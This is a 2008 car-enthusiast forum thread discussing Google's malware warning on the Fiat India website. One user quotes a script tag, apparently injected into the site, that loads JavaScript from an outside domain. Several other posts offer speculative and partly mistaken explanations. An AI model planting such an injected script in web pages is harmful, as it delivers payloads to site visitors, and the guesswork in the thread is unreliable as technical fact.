Team-BHP > The Indian Car Scene
Register New Topics New Posts Top Thanked Team-BHP FAQ

Search this Thread
Old 8th July 2008, 15:26   #16
Senior - BHPian

works with FF3 & Trend micro

Tried with Firefox 3 & Trend micro anti-virus. Website pages get displayed appropriately, did not notice anything suspicious.
May be Avira anti-virus is detecting something as virus while other anti-virus are not treating it so.
Old 8th July 2008, 15:27   #17
Senior - BHPian

Quote:
Originally Posted by amit View Post
Search Fiat India in Google using firefox and the site gets listed but below it, it says "This site may harm your computer."
not only firefox - i am getting this message using lotus notes & IE as well.
Old 8th July 2008, 15:28   #18
BHPian

Quote:
Originally Posted by amit View Post
Search Fiat India in Google using firefox and the site gets listed but below it, it says "This site may harm your computer."
Quote:
Originally Posted by sukiwa View Post
Tried with Firefox 3 & Trend micro anti-virus. Website pages get displayed appropriately, did not notice anything suspicious.
May be Avira anti-virus is detecting something as virus while other anti-virus are not treating it so.
Sukiwa - Google "Fiat India" using Firefox.
Old 8th July 2008, 15:45   #19
BHPian

Coding Horror: This Site May Harm Your Computer
"This site may harm your computer" - says Google

Some articles of interest. Courtesy: Mr. Bangalore.
Old 8th July 2008, 15:53   #20
BHPian

I think the problem is within your PC itself. Never use Avira kinda freeware as Antivirus, most of the time such antivirus s/w itself could be the Virus or Phisher.I have checked the site with all the maximum protection mode. I found no issues with the website. Not even a single cookie tried by the site to infuse. Used both IE and Opera.
Old 8th July 2008, 16:03   #21
BHPian

hey I Can't access the site from my PC it says it is a Phiser .I Think something is definetely wrong with the site.
Old 8th July 2008, 16:04   #22
BHPian

or try disabling the antivirus and try.. that will confirm it is b'coz of antivirus or firewall..
Old 8th July 2008, 16:26   #23
BANNED

Site seem to have been hacked - I can see <script src=http://www.adupd.mobi/b.js></script> in their scripts !!!

Be careful !!!
Old 8th July 2008, 16:27   #24
Senior - BHPian

Guys
I used Mozilla Firefox 3 and ESET Smart Security 3.0.645.0 to open the website.

I got the same error when i opened the website. From the google safe browsing diagonistic page i think that there are some javascripts which are runned by malicious companies who are trying to install malware into the user's computer whoever open the website.

Secondly the ready made javascripts that website developer of fiat india have implemented already contains malicious code which hampers the website from display. There are plenty of javascripts which are available on net and the programmer of this website used one of them after making the required changes, but didn't concentrate on removing third parties information which is included in the javascript. And this javascript is not supported by mozilla firefox as well as the google. that is why this warning is coming.

I may be wrong but from the report generated by GOOGLE this is what looks like is the scenario.

For reference i am attaching the screenshot. Though its same as the one given by the thread starter
Attached Thumbnails
Fiat India website has a virus !!!-fiatindia-virus-prob.jpg  

Old 8th July 2008, 16:33   #25
BHPian

As website As company

Quote:
Originally Posted by hrag View Post
They don't want people visiting their website and getting frustrated with the delay in bringing on their new cars.

I think Fiat is working in India as it Website. Certainly virus has been attacted to not only its website but also to the company as well.

Whole of India is waiting for the new models of Fiat and Fiat is in no mood to release them
Old 8th July 2008, 16:38   #26
Team-BHP Support

This has nothing to do with browser.
Actually Google anti-phishing etc., filter has marked this site as harmful
See here
Fiat India website has a virus !!!-1.jpg
Old 8th July 2008, 18:07   #27
BHPian

Can some tech guru tell me how a virus can enter a website? This is the first time I have seen a reputable company's website hosting a virus.
Old 8th July 2008, 18:17   #28
Team-BHP Support

There could be so many ways. If the site features ads on top or the on sidebars then those could be a prominent way for the worms and trojans to get in. These are basically 3rd party things on which the website may not have direct controls.

It is also possible that the designers/developers of the site used the famed cut-paste technology. They used some readymade javascript files at best with some modifications but did not realize that it has some script lines which are immediately construed as iffy. Trying to open a very small window below all other ones open on the screen, trying to exchange data with this window from the main window etc when put together is regarded as reasonably shady practice even if it actually may not be so all the time.

It is also possible that sometimes the development machine had a virus which infected a few files and then they were directly put into Production.

There are many such ways this could have happened.
Old 8th July 2008, 19:09   #29
BANNED

Quote:
Originally Posted by Proxima View Post
This is the first time I have seen a reputable company's website hosting a virus.
No. There were some instances earlier too.

Where're the website developer of Fiat India? He is also caught napping it seems.
Old 8th July 2008, 19:16   #30
Senior - BHPian

I am using firefox 2.15 and my antivirus is AVG free 8.0.
I am not getting any warning.

But when I search in google, they say " This site may harm your computer ".

O.T.
When I had installed firefox 3, when I tried to post reply, the text box was extended in the smilies portion. Did anyone else face this problem ?
Attached Thumbnails
Fiat India website has a virus !!!-tbhpfiat1.jpg  

Fiat India website has a virus !!!-tbhpfiat2.jpg  

Fiat India website has a virus !!!-tbhpfiat3.jpg  

Most Viewed

Copyright ©2000 - 2024, Team-BHP.com
Proudly powered by E2E Networks